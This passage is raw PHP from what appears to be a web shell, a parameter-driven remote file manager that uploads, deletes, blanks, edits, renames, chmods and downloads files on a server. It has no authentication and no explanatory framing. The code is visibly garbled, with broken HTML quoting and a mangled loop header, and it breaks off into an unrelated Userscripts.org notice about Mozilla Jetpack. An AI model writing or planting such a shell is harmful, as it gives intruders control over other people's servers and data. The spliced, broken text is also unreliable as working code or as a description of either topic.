$uploadfile15)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile15</i><br />";} if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile16</i><br />";} if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile17</i><br />";} if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile18</i><br />";} if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile19</i><br />";} if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) { $where=str_replace("\\\\","\\",$where); echo "<i>Uploaded to $uploadfile20</i><br />";} } echo $copyr; exit;} if(@$_GET['yes']=="yes"){ $d=@$_GET['d']; $e=@$_GET['e']; unlink($d."/".$e); $delresult="Success $d/$e deleted <meta content="\\"2;URL=$php_self?d=$d\" http-equiv="\\"REFRESH\" />"; } if(@$_GET['clean']=="1"){ @$e=$_GET['e']; $x=fopen("$d/$e","w"); fwrite($x,""); echo "<meta content="\\"0;URL=$php_self?d=$d&e=\".@$e.\"\" http-equiv="\\"REFRESH\" />"; exit; } if(@$_GET['e']){ $d=@$_GET['d']; $e=@$_GET['e']; $pinf=pathinfo($e); if(in_array(".".@$pinf['extension'],$images)){ echo "<meta content="\\"0;URL=$php_self?d=$d&e=$e&img=1\" http-equiv="\\"REFRESH\" />"; exit;} $filename="$d/$e"; $fd = @fopen ($filename, "r"); $c = @fread ($fd, @filesize ($filename)); $c=htmlspecialchars($c); $de=$d."/".$e; $de=str_replace("//","/",$de); if(is_file($de)){ if(!is_writable($de)){echo "<font color="red">READ ONLY</font><br />";}} echo "[<a href="$php_self?d=$d&del_f=1&wich_f=$e">Delete</a>] [<a href="$php_self?d=$d&ef=$e&edit=1">Edit</a>] [<a href="$php_self?d=$d&e=$e&clean=1">Filesize to 0 byte</a>] [<a href="$php_self?d=$d&e=$e&replace=1">Replace text in file</a>] [<a href="$php_self?d=$d&download=$e">Download</a>] [<a href="$php_self?d=$d&rename=1&wich_f=$e">Rename</a>] [<a href="$php_self?d=$d&chmod=1&wich_f=$e">CHMOD</a>] [<a href="$php_self?d=$d&ccopy_to=$e">Copy</a>]<br />"; echo " File contents:<br /> $de <br /><table cellspacing="0" border="1" cellpadding="0" width="100%"><tr><td><pre> $c </pre></td></tr></table> "; if(@$_GET['delete']=="1"){ $delete=$_GET['delete']; echo " DELETE: Are you sure?<br /><a href="\\"$php_self?d=$d&e=$e&delete=\".@$delete.\"&yes=yes\">Yes</a> || <a href="$php_self?no=1">No</a><br /> "; if(@$_GET['yes']=="yes"){ @$d=$_GET['d']; @$e=$_GET['e']; echo $delresult; } if(@$_GET['no']){ echo "<meta content="\\"0;URL=$php_self?d=$d&e=$e\" http-equiv="\\"REFRESH\" /> "; } } #end of delete echo $copyr; exit; } #end of e if(@$_GET['edit']=="1"){ @$d=$_GET['d']; @$ef=$_GET['ef']; $e=$ef; if(is_file($d."/".$ef)){ if(!is_writable($d."/".$ef)){echo "<font color="red">READ ONLY</font><br />";}} echo "[<a href="$php_self?d=$d&del_f=1&wich_f=$e">Delete</a>] [<a href="$php_self?d=$d&ef=$e&edit=1">Edit</a>] [<a href="$php_self?d=$d&e=$e&clean=1">Filesize to 0 byte</a>] [<a href="$php_self?d=$d&e=$e&replace=1">Replace text in file</a>] [<a href="$php_self?d=$d&download=$e">Download</a>] [<a href="$php_self?d=$d&rename=1&wich_f=$e">Rename</a>] [<a href="$php_self?d=$d&chmod=1&wich_f=$e">CHMOD</a>] [<a href="$php_self?d=$d&ccopy_to=$e">Copy</a>]<br />"; $filename="$d/$ef"; $fd = @fopen ($filename, "r"); $c = @fread ($fd, @filesize ($filename)); $c=htmlspecialchars($c); $de=$d."/".$ef; $de=str_replace("//","/",$de); echo " Edit:<br /> $de<br />"; if(!@$_POST['save']){ print " <form method="post"><input name="filename" value="$d/$ef" /><textarea name="editf" rows="30" cols="143">$c</textarea><br /><input name="save" type="submit" value="Save changes" /></form><br /> "; } if(@$_POST['save']){ $editf=@$_POST['editf']; if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){ $editf=stripslashes($editf); } $f=fopen($filename,"w+"); fwrite($f,"$editf"); echo "<br /><b>File edited.</b><meta content="\\"0;URL=$php_self?d=$d&e=$ef\" http-equiv="\\"REFRESH\" />"; exit; } echo $copyr; exit; } echo" <table class="hack" cellspacing="0" cellpadding="1" width="100%"><tr><td bgcolor="#519A00"><center><b>Filename</b></center></td><td bgcolor="#519A00"><center><b>Tools</b></center></td><td bgcolor="#519A00"><b>Size</b></td><td bgcolor="#519A00"><center><b>Owner/Group</b></center></td><td bgcolor="#519A00"><b>Perms</b></td></tr> "; $dirs=array(); $files=array(); $dh = @opendir($d) or die("<table width="100%"><tr><td><center>Permission Denied or Folder/Disk does not exist</center><br />$copyr</td></tr></table>"); while (!(($file = readdir($dh)) === false)) { if ($file=="." || $file=="..") continue; if (@is_dir("$d/$file")) { $dirs[]=$file; }else{ $files[]=$file; } sort($dirs); sort($files); $fz=@filesize("$d/$file"); } function perm($perms){ if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } for($i=0; $i<count><count>< 1024){$siz=$size.' b'; }else{ if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{ if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{ if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';} }}} echo "
Jetpack, a new project by Mozilla Labs, a new way to extend Firefox on tools you already know: jQuery, Firebug, JavaScript and HTML
Userscripts.org is excited to see how Jetpack evolves. If you have ideas on how we can better support Jetpack, join us in our Jetpack forum.
